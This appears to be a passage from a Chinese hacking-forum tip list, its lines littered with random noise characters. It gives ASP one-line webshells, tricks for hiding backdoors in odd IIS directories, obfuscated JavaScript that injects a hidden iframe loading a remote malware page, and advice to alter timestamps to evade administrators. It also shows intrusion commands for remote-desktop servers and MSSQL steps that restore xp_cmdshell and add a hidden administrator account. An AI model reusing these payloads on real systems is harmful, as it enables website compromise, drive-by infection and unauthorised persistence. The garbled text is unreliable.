' p. k7 L  S6 S( D' Ud).<script language=VBScript runat=server>execute request("sb")</Script># [+ C/ V2 ~/ R" a
e).<%25Execute(request("l"))%25>! i# S# c0 f( W2 N$ M: T
f).<%if request("cmd")<>"" then execute request("pass")%>% F* G- w+ q6 ^. r' _% K2 p! r
5 \+ A) o. M, I2 v1 s
52、at "12:17" /interactive cmd
5 c: s! N1 ^1 B& D% m( C' Q执行后可以用AT命令查看新加的任务: @/ r" w4 O  E1 |
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。: @: k1 ?. n# W& Z6 I
6 D( q( J! \/ @# h1 j! \. `( b
53、隐藏ASP后门的两种方法: g9 D+ e; L, E8 M2 Z' M+ E
1、建立非标准目录:mkdir images..\
0 [8 g: E) \. @- y9 t$ D* A拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
1 T2 ?6 d& ~4 b" c; U, o通过web访问ASP木马:http://ip/images../news.asp?action=login+ v( q8 Z% y/ Z" U6 o8 T
如何删除非标准目录:rmdir images..\ /s9 H' }% b. e( l! X/ T
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
" }( A: F' r. n: {6 j0 a9 s% amkdir programme.asp
  v4 Y3 R( _; M0 W$ x5 m新建1.txt文件内容:<!--#include file=”12.jpg”-->
1 |; E0 y4 e7 Y4 J( b新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
* z9 S+ V& B6 x* jattrib +H +S programme.asp8 o3 j# }( u; F, a
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt& N; r: z& M  L- {! w" a6 v, I

, Y, l' Z  [( R54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
. g: N; q" X7 K然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。! D6 [3 J; r, E" a

7 O! \! x8 d1 @/ @- s. p55、JS隐蔽挂马
; }+ r/ N2 N* {# n# y. p: Y. ~1.% b9 A0 U" a: q- x- V0 Q  q
var tr4c3="<iframe src=ht";
- o6 T" I* Z5 M3 L  Btr4c3 = tr4c3+"tp:/";
' t. c( z) c6 h# d# y/ rtr4c3 = tr4c3+"/ww";
  L4 ]' K0 O- z: e4 xtr4c3 = tr4c3+"w.tr4";! q* S) r# X7 @& \5 `5 n
tr4c3 = tr4c3+"c3.com/inc/m";
+ m3 k9 W5 g+ t2 J8 N; _" otr4c3 = tr4c3+"m.htm style="display:none"></i";
4 U* v# D  K  P9 v9 Ptr4c3 =tr4c3+"frame>'";6 n. n) q1 F4 a$ `" e/ W
document.write(tr4c3);
, P0 y* [$ t" d5 \3 q避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。& H5 i% m1 F0 I
1 \& O" x; o5 L/ @* p
2.! \2 }- I1 U5 |' p4 o
转换进制,然后用EVAL执行。如3 B$ y& u2 J! T6 ^' C: h0 ?9 q8 u
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");9 u3 L# K  z' _" P5 I
不过这个有点显眼。, m! C1 X& ~  l  m9 E
3.# V& X4 o3 k1 A8 \# U
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
' |& @" v% ?9 I2 M& R1 D最后一点,别忘了把文件的时间也修改下。
$ [6 G( a3 a- f- q9 ], O- V! W; g$ Q; b2 N$ o3 S4 u) [" T5 c
56.3389终端入侵常用DOS命令
; O8 C" y/ |6 d+ E, k7 Itaskkill taskkill /PID 1248 /t
; L0 w! k" i' e6 ]3 A
$ }  J; |" R& l$ itasklist 查进程9 o. T; @. u% M* r
) s& L$ y' ]/ q" z8 R% d
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限( y# f* u3 B/ a1 ]0 U, k
iisreset /reboot" `2 z1 H9 p6 [) R0 z0 Q$ s0 t* |: o
tsshutdn /reboot /delay:1    重起服务器
+ l& X0 R) B* P5 {4 I- U3 {8 |6 x4 L6 d
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,# U6 y! A' V" [$ a7 q' f

: ~# L  M* N! I/ Yquery user 查看当前终端用户在线情况
8 T+ I* s# ?/ n% w  b# O0 D) y7 q/ Y  q2 d0 r1 n! e5 s1 s
要显示有关所有会话使用的进程的信息,请键入:query process *
7 e# @( t# a9 C# K4 y* z$ ^2 u$ |, t0 p! P; L  g) u& C
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2# K( i9 f% H: ]6 i3 d

/ s0 _4 v& r+ S5 P, y& a, P, C3 I要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER27 h" b. v! G+ q; p) x3 E
0 Q, h9 O7 n0 l6 [
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
) h2 p: J& J  q  R, Y6 O# V6 `# T0 S. |. p! L! A+ T0 e8 |5 K
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
2 |8 t) I6 _) X" L$ a4 ]
9 ?# i8 r5 h/ f, z6 R" H4 O: \( m( l& j命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统: P  g! j" u- V, k' c& g' P

, v3 h2 ^4 b5 f命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。, m+ T9 R" g: S$ `

4 G5 O: Q4 ^! l1 u9 P5 g命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机* ]$ b& T9 q' L% Y
$ I2 v, o  j+ ?+ J7 e" i
56、在地址栏或按Ctrl+O,输入:
7 p- r, C/ ^; G1 Y& r+ B/ f! Bjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
! b, Z, r0 }3 a; s  a& T% |# t* {. \! x5 H
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。  B. a  S9 T, x3 [6 q

" P' ^% W6 E) J$ H57、net user的时候,是不能显示加$的用户,但是如果不处理的话,9 n5 g7 G% Z2 d
用net localgroup administrators是可以看到管理组下,加了$的用户的。! `$ i# n( ]9 j+ g8 I) U* ~  x9 e

: n9 J2 _: E7 Z# q# j( I58、 sa弱口令相关命令
5 `+ X* ~/ C+ l+ ^/ f# i. }# l+ T
一.更改sa口令方法:4 A" O9 e/ G; F  R5 u  ~, f  s4 G1 h: @
用sql综合利用工具连接后,执行命令:3 Z8 _! X- o5 L# F; I$ n  N. Q
exec sp_password NULL,'20001001','sa'
9 s" P5 K, t. X8 [: N' _(提示:慎用!)
+ v# p1 u; H" x& `5 |9 k5 j" A7 L* [/ V: F
二.简单修补sa弱口令.6 ]$ V7 V0 Z# V! j
+ a: h) I/ ~% ^$ K( H
方法1:查询分离器连接后执行:! h9 z1 ]& P1 b4 _3 q
if exists (select * from
$ O. @8 b6 N/ Y6 ~' Z* b7 Gdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
, {; E5 W) \% G- kOBJECTPROPERTY(id, N'IsExtendedProc') = 1): _5 P" ~% O# F2 k6 D8 O
* Q7 n9 X2 U; [2 a, Z* w# T
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'8 r+ a9 `( |6 a) X, g8 Q: S

% A. X: g. O; M( ~GO
( Z6 J- w9 j8 T3 V( Q
2 Z- t/ G9 P/ V, i6 ?然后按F5键命令执行完毕
( r1 s/ B3 U8 k9 i6 l8 S0 d4 s$ s4 ?" g, X8 Y5 O4 G
方法2:查询分离器连接后* k/ i; f- Q5 s( X
第一步执行:use master' `0 w; |- `* p9 j- \
第二步执行:sp_dropextendedproc 'xp_cmdshell') }, }7 r2 p  T* _/ Q0 ]) s
然后按F5键命令执行完毕1 ]' |" X) i3 P( F% P) P# O+ @4 t& z

, d4 }, \/ p+ I9 n4 d3 D
2 q/ Z! b  z- ~% W" j三.常见情况恢复执行xp_cmdshell.
2 b  d: B! o0 H$ N  `; g0 [6 D  f! s7 S6 r% H1 O! |8 t) |. A
  A1 ~: F# n4 _
1 未能找到存储过程'master..xpcmdshell'." \( I: B: v: b$ t
   恢复方法:查询分离器连接后,
7 N# u+ S" N" l2 O* s/ f2 r第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
1 k1 S& [  o% E% x+ P( g第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
) U! F* E3 M6 d, \% C0 [( d然后按F5键命令执行完毕
1 a+ l6 t0 _) R( b+ `7 X) E8 `" [- k4 ~, }4 Y; [3 X  Z
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)5 z4 @+ d# H; _- ?) r
恢复方法:查询分离器连接后,/ X- R* `" N; T$ f( K+ ~/ p
第一步执行:sp_dropextendedproc "xp_cmdshell"6 H1 Y2 ^+ y! z- s/ i
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'6 i+ x- {& w$ M
然后按F5键命令执行完毕
% u7 ]' U' ?& k5 m
1 v9 Z% L+ ]7 c/ w% N7 O3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
" ]4 _* E6 d) o1 }9 H, [& n* j恢复方法:查询分离器连接后,2 J% s6 S$ ~8 H$ Q3 S& e. a
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
6 |, d1 F1 K/ c5 e第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           , D* |' k" a8 d% l7 [/ r  U
然后按F5键命令执行完毕
3 D" u! G" W) C* v8 o0 k4 Z* O( n( {. j' O2 }. L; \
四.终极方法.' G) g; E4 Z2 B& B' Z1 z7 M
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:4 ]% E6 X7 N, [* v
查询分离器连接后,
- T# I2 l% T. I! m, ]( T2000servser系统:
! y, _  s7 a, k1 n/ B8 t" i  ?declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
* ^+ k/ M8 [- B  Z2 F  Z; p- y2 ?. V6 u% n) p. R
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
. j; b7 Q" i5 \6 z0 J: e* f2 w# s7 j2 M0 j2 j& x8 f2 _6 s2 f
xp或2003server系统:
, C7 C* T2 b1 U, [5 P, W2 y9 [* B  ~$ P$ z3 @
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
' c* ~- L8 J% u' @# z& _# T  s# E1 v- q* A! k9 y) a
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
- e  b# s  x0 W" C
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表